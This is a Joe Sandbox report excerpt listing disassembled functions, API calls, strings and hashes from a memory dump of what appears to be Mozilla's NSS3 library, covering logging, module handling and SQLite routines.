Opcode Fuzzy Hash: cf7e38fd11c97cfb051d73e0c48a0d8c847d737baa02583ad0a570b23a6aba39
Instruction Fuzzy Hash: 2F31D5B1701255EFDB10DF18DD48F4A3BB1EB82359F454439E808A7611DF30A948CBAB

Function 6C59AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C59AF47

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

FreeLibrary.KERNEL32(?), ref: 6C59AF6D
free.MOZGLUE(?), ref: 6C59AFA4
free.MOZGLUE(?), ref: 6C59AFAA
PR_ExitMonitor.NSS3 ref: 6C59AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C59AFF5
PR_ExitMonitor.NSS3 ref: 6C59B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C59B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C59B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C59B03C

Strings

%s decr => %d, xrefs: 6C59AFF0
Unloaded library %s, xrefs: 6C59B023

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: cb9aafd01308524e91741b0d5f7f7dfe3d1b9564fd0054872e0576c22a1e2aaa
Instruction ID: 2721759f88a717af97f222f8dc0c548582850b106a647a0112039daa44ba1591
Opcode Fuzzy Hash: cb9aafd01308524e91741b0d5f7f7dfe3d1b9564fd0054872e0576c22a1e2aaa
Instruction Fuzzy Hash: DE31F6F9F04140ABEB01EF65DC40A45B775EB4630CB1441B9E80796E00FB22E828CBB6

Function 6C5E6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5E781D,00000000,6C5DBE2C,?,6C5E6B1D,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5E781D,?,6C5DBE2C,?), ref: 6C5E6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5E6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5E6C96

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5E6CAA

Strings

extern:, xrefs: 6C5E6C7E
rdb:, xrefs: 6C5E6C69
sql:, xrefs: 6C5E6C52
dbm, xrefs: 6C5E6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6C5E6C91
dbm:, xrefs: 6C5E6C3A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 9a3aba98a30e3079ded21d31f7afc02b64c8af529872f2a0bc845b9f9fe7a4e3
Instruction ID: 86fd1729b1904374d5bd3d4d03ae32b9785c00a11ff3b0751ec71dacb946f9e2
Opcode Fuzzy Hash: 9a3aba98a30e3079ded21d31f7afc02b64c8af529872f2a0bc845b9f9fe7a4e3
Instruction Fuzzy Hash: 3E01F2B17073153BFA10277B2C8AF63220E9F5918CF140832FF19E0982EFA2E51580AD

Function 6C5F4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C5B78F8), ref: 6C5F4E6D

Part of subcall function 6C5909E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5906A2,00000000,?), ref: 6C5909F8
Part of subcall function 6C5909E0: malloc.MOZGLUE(0000001F), ref: 6C590A18
Part of subcall function 6C5909E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C590A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5B78F8), ref: 6C5F4ED9

Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C5E7703,?,00000000,00000000), ref: 6C5E5942
Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C5E7703), ref: 6C5E5954
Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E596A
Part of subcall function 6C5E5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E5984
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C5E5999
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E59BA
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5E59D3
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E59F5
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C5E5A0A
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E5A2E
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C5E5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4EB3

Part of subcall function 6C5F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5F4EB8,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F484C
Part of subcall function 6C5F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5F4EB8,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F486D
Part of subcall function 6C5F4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C5F4EB8,?), ref: 6C5F4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4EC0

Part of subcall function 6C5F4470: TlsGetValue.KERNEL32(00000000,?,6C5B7296,00000000), ref: 6C5F4487
Part of subcall function 6C5F4470: EnterCriticalSection.KERNEL32(?,?,?,6C5B7296,00000000), ref: 6C5F44A0
Part of subcall function 6C5F4470: PR_Unlock.NSS3(?,?,?,?,6C5B7296,00000000), ref: 6C5F44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C6CDCB0,00000000), ref: 6C5F4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C5F501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F506B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: c180bfcad5d26a931fc0b5e20145275914b650eb3cb8ae33410fccd7c6771178
Instruction ID: 4ac21f56477129f482bf05a22814c289c893d7c2e9238c3f9497dd634219a02b
Opcode Fuzzy Hash: c180bfcad5d26a931fc0b5e20145275914b650eb3cb8ae33410fccd7c6771178
Instruction Fuzzy Hash: 0151F4F6A00201DBEB159F25EC4569B37B9EF4531CF048535E82A86B12FB31D91ACF92

Function 6C59ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59ACE2
malloc.MOZGLUE(00000001), ref: 6C59ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C59AD02
TlsGetValue.KERNEL32 ref: 6C59AD3C
calloc.MOZGLUE(00000001,?), ref: 6C59AD8C
PR_Unlock.NSS3 ref: 6C59ADC0
free.MOZGLUE(00000000), ref: 6C59AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C59AE58
free.MOZGLUE(00000000), ref: 6C59AE69
free.MOZGLUE(?), ref: 6C59AE78
PR_Unlock.NSS3 ref: 6C59AE8C
free.MOZGLUE(?), ref: 6C59AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C59AEC7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: f6800438ac128afd105b1b770140b94fc55f54ba09b3fb79898ec79fb86d7994
Instruction ID: d24eb89d8adf0b7470663953e21495e902424fb4b6a914b540e96b22c8529adc
Opcode Fuzzy Hash: f6800438ac128afd105b1b770140b94fc55f54ba09b3fb79898ec79fb86d7994
Instruction Fuzzy Hash: 1F51BEB0F002569BDF00DF69DC816AE77B4BB06348F1844B9D815A7B10DB31A914CBEA

Function 6C674C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C674CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674CFD
sqlite3_value_text16.NSS3(?), ref: 6C674D44

Strings

no more rows available, xrefs: 6C674D2E
API call with %s database connection pointer, xrefs: 6C674CF6
out of memory, xrefs: 6C674C78, 6C674C9E
another row available, xrefs: 6C674D20
unknown error, xrefs: 6C674D56
abort due to ROLLBACK, xrefs: 6C674D27, 6C674D33
invalid, xrefs: 6C674CF1
bad parameter or other API misuse, xrefs: 6C674D05

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 089a81308007e714226bfa6b7dbeb4fe438a79c582ba79e38897675e786373e6
Instruction ID: fafaac22129dd6bf0028478a650aff1384b08a9e9679d79e7800f72973685902
Opcode Fuzzy Hash: 089a81308007e714226bfa6b7dbeb4fe438a79c582ba79e38897675e786373e6
Instruction Fuzzy Hash: 733168B3E08951A7D7244A24A9087F4B3A27B82318F150D29D4645BE15CBE1AC62CFFE

Function 6C5D2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C5D2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C5D2D07

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D2D22

Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0B88
Part of subcall function 6C6B09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6B0C5D
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C6B0C8D
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0C9C
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0CD1
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C6B0CEC
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0CFB
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0D16
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C6B0D26
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0D35
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C6B0D65
Part of subcall function 6C6B09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C6B0D70
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0D90
Part of subcall function 6C6B09D0: free.MOZGLUE(00000000), ref: 6C6B0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D2D3B

Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C6B0BAB
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0BBA
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C5D2D54

Part of subcall function 6C6B09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B0BCB
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0BDE
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0C16

Strings

ulPinLen = %d, xrefs: 6C5D2D36
pLabel = 0x%p, xrefs: 6C5D2D4F
nkl, xrefs: 6C5D2D6C, 6C5D2D9A
pPin = 0x%p, xrefs: 6C5D2D1D
slotID = 0x%x, xrefs: 6C5D2D02
C_InitToken, xrefs: 6C5D2CE7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nkl
API String ID: 420000887-3781152025
Opcode ID: b67468ed27fb7ae8da330682360f902f33eef61f0071e4872cbc84c6bc6a47db
Instruction ID: 940be24396cd1fcc7a574507ef8178272e4161142244e2686eed64079e7a7860
Opcode Fuzzy Hash: b67468ed27fb7ae8da330682360f902f33eef61f0071e4872cbc84c6bc6a47db
Instruction Fuzzy Hash: E721A4B6700245EFDB00BF58DD4CA453BB1EB8731AF458169E504A7622DF30AC59CB66

Function 6C672D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C672D9F

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

sqlite3_exec.NSS3(?,?,6C672F70,?,?), ref: 6C672DF9
sqlite3_free.NSS3(00000000), ref: 6C672E2C
sqlite3_free.NSS3(?), ref: 6C672E3A
sqlite3_free.NSS3(?), ref: 6C672E52
sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C672E62
sqlite3_free.NSS3(?), ref: 6C672E70
sqlite3_free.NSS3(?), ref: 6C672E89
sqlite3_free.NSS3(?), ref: 6C672EBB
sqlite3_free.NSS3(?), ref: 6C672ECB
sqlite3_free.NSS3(00000000), ref: 6C672F3E
sqlite3_free.NSS3(?), ref: 6C672F4C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 036735677b9f4a95ee0dba9ba116c704d0acc9f06036494cb0565b9da91d5918
Instruction ID: a57ab78001a17c7b11d566199f21bd2b0febfd622737feed530b01745826c77b
Opcode Fuzzy Hash: 036735677b9f4a95ee0dba9ba116c704d0acc9f06036494cb0565b9da91d5918
Instruction Fuzzy Hash: BB617CB5E00205CBEB10CFA8D884BDEB7F1AF89358F144828DC55A7741E735E855CBA9

Function 6C5B7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C702120,6C5B7E60,00000000,?,?,?,?,6C63067D,6C631C60,00000000), ref: 6C5B7C81

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

TlsGetValue.KERNEL32 ref: 6C5B7CA0
EnterCriticalSection.KERNEL32(?), ref: 6C5B7CB4
PR_Unlock.NSS3 ref: 6C5B7CCF

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

TlsGetValue.KERNEL32 ref: 6C5B7D04
EnterCriticalSection.KERNEL32(?), ref: 6C5B7D1B
realloc.MOZGLUE(-00000050), ref: 6C5B7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B7DF4
PR_Unlock.NSS3 ref: 6C5B7E0E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 4989f842cf4b6b7b1f7f60b0b8f0cf9dc790dd80a227b498fa2b4d119538072a
Instruction ID: 79e59e298cda1e4e036679d2db3d5b7705b1934f3a4d135c8c9851dedf66129a
Opcode Fuzzy Hash: 4989f842cf4b6b7b1f7f60b0b8f0cf9dc790dd80a227b498fa2b4d119538072a
Instruction Fuzzy Hash: 545104B6B04100AFDB00AF28DC54A653BB5EB463D8F15853EEA0567722EF30D854CBA1

Function 6C524C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D97
PR_Lock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DBA
PR_WaitCondVar.NSS3 ref: 6C524DD4
PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DEF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 283c9ea25cd19b75596aa3c1742f8d9b5b794c571bd6679ce542dad2468a94c1
Instruction ID: 680fd1ae1fb31775a84efbdda739f45ebdb0a88b6f05bb94d39a07672c05190c
